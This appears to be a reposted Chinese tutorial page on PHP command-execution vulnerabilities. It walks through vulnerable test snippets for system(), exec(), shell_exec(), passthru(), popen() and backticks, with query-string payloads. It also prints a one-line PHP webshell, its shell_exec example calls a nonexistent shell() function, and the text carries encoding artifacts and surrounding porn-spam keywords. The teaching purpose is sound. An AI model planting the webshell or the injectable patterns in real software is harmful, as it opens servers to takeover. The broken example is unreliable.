av一区二区在线观看_亚洲男人的天堂网站_日韩亚洲视频_在线成人免费_欧美日韩精品免费观看视频_久草视

您的位置:首頁技術(shù)文章
文章詳情頁

php網(wǎng)絡(luò)安全中命令執(zhí)行漏洞的產(chǎn)生及本質(zhì)探究

瀏覽:29日期:2022-06-06 15:25:39
目錄
  • 漏洞的產(chǎn)生原因
  • 漏洞的本質(zhì)
  • 涉及到的函數(shù)
  • 命令執(zhí)行漏洞的危害
  • 命令執(zhí)行漏洞的防御
  • 命令執(zhí)行相關(guān)函數(shù)的使用
    • system()
    • exec()
    • shell_exec()
    • passthru()
    • popen()
  • 反引號(hào)

    漏洞的產(chǎn)生原因

    • 代碼層過濾不嚴(yán)。應(yīng)用程序直接或間接使用了動(dòng)態(tài)執(zhí)行命令的危險(xiǎn)函數(shù),并且這個(gè)函數(shù)的運(yùn)行參數(shù)是可控的
    • 系統(tǒng)的漏洞造成命令注入

    漏洞的本質(zhì)

    應(yīng)用有時(shí)需要調(diào)用一些執(zhí)行系統(tǒng)命令的函數(shù),當(dāng)服務(wù)器沒有嚴(yán)格過濾用戶提供的參數(shù)時(shí),就有可能導(dǎo)致用戶提交惡意代碼被服務(wù)器執(zhí)行,從而造成命令執(zhí)行漏洞。

    涉及到的函數(shù)

    • 1.system
    • 2.exec()
    • 3.shell_exec()
    • 4.passthru()
    • 5.popen()
    • 6.反引號(hào)

    命令執(zhí)行漏洞的危害

    • 1.繼承Web 服務(wù)器程序權(quán)限(Web用戶權(quán)限),去執(zhí)行系統(tǒng)命令
    • 2.繼承Web服務(wù)器權(quán)限,讀寫文件
    • 3.反彈Shell
    • 4.控制整個(gè)網(wǎng)站
    • 5.控制整個(gè)服務(wù)器

    命令執(zhí)行漏洞的防御

    • 1、盡量少使用執(zhí)行命令函數(shù)或者禁用disable_functions
    • 2、在進(jìn)入執(zhí)行命令的函數(shù)之前,對(duì)參數(shù)進(jìn)行過濾,對(duì)敏感字符進(jìn)行轉(zhuǎn)義
    • 3、參數(shù)值盡量使用引號(hào)包括,并在拼接前調(diào)用addslashes進(jìn)行轉(zhuǎn)義

    命令執(zhí)行相關(guān)函數(shù)的使用

    system()

    • 說明:能夠?qū)⒆址鳛镺S命令執(zhí)行,自帶輸出功能
    • 測試參考代碼:
    <?php
    if(isset($_GET["cmd"])){
        system($_GET["cmd"]);
    }
    ?>
    payload:?cmd=ipconfig

    exec()

    • 說明:能將字符串作為OS命令執(zhí)行,但無輸出,需要輸出執(zhí)行結(jié)果print。
    • exec() 默認(rèn)只輸出最后一行的數(shù)據(jù)
    • 如果想讓他輸出全部結(jié)果,可以加一個(gè)參數(shù),即exec(ifconfig,$arr); print_r($arr);,如一句話木馬:<?php exec($_REQUEST[123],$arr);print_r($arr)?>
    • 測試參考代碼
    <?php
    if(isset($_GET["cmd"])){
        print exec($_GET["cmd"]);
    }
    ?>
    payload:?cmd=whoami

    shell_exec()

    • 說明:執(zhí)行命令并以字符串的形式,返回完整的信息,但是函數(shù)無回顯,需要輸出執(zhí)行結(jié)果。
    • 測試參考代碼
    <?php
    if(isset($_GET["cmd"])){
        print shell($_GET["cmd"]);
    }
    ?>
    payload:?cmd=whoami

    passthru()

    • 說明:執(zhí)行外部命令,與system()類似,但是該函數(shù)會(huì)直接將結(jié)果輸出,無需輸出執(zhí)行。
    • 測試參考代碼
    <?php
    if(isset($_GET["cmd"])){
        passthru($_GET["cmd"]);
    }
    ?>
    payload:?cmd=whoami

    popen()

    • 說明:能夠執(zhí)行OS命令,但是該函數(shù)并不是返回命令結(jié)果,而是返回一個(gè)文件指針
    • 測試參考代碼
    <?php
    if(isset($_GET["cmd"])){
        $cmd=$_GET["cmd"].">>1.txt";
        popen($cmd,"r");
    }
    ?>
    payload:?cmd=whoami

    反引號(hào)

    • 說明:反引號(hào)[``]內(nèi)的字符串,也會(huì)被解析成OS命令
    • 反引號(hào)背后執(zhí)行的代碼其實(shí)是調(diào)用了shell_exec(),所以禁用了shell_exec()同樣反引號(hào)也無法使用了。
    • 測試參考代碼
    <?php
    if(isset($_GET["cmd"])){
        $cmd=$_GET["cmd"];
        print `$cmd`;
    }
    ?>
    payload:?cmd=whoami

    到此這篇關(guān)于php網(wǎng)絡(luò)安全中命令執(zhí)行漏洞的產(chǎn)生及本質(zhì)探究的文章就介紹到這了,更多相關(guān)php命令執(zhí)行漏洞內(nèi)容請(qǐng)搜索以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持!

    標(biāo)簽: PHP
    主站蜘蛛池模板: 国产69精品久久久久777 | 亚洲午夜精品一区二区三区 | av国产精品毛片一区二区小说 | 免费一级片 | 一级在线观看 | 欧美精品久久久久久久久久 | 玖玖综合在线 | 精品少妇一区二区三区在线播放 | 亚洲日本乱码在线观看 | 久久久视 | 国产精品自拍av | 国产精品区一区二区三 | 欧一区二区 | 91黄在线观看 | 久久久久久久一区二区三区 | 999视频 | 久久精品a级毛片 | 中文字幕av中文字幕 | 国产精品一区二区久久久久 | 综合网视频| 黄色网页在线观看 | 99国内精品久久久久久久 | 亚洲欧美日韩精品久久亚洲区 | 中文字幕 在线观看 | 一级黄在线观看 | 亚洲欧美一区二区三区国产精品 | 精品国产伦一区二区三区观看体验 | 欧美一区免费 | 爱爱视频在线观看 | 玖玖视频网| 日本一区二区三区四区 | 亚洲精品在线免费 | 国产精品久久久久久久久免费樱桃 | 精品国产精品三级精品av网址 | 国产精品久久久久久一级毛片 | 国产精品揄拍一区二区 | 欧美一级二级视频 | h视频在线免费 | 久久久久亚洲国产| 成年人精品视频 | 一本色道精品久久一区二区三区 |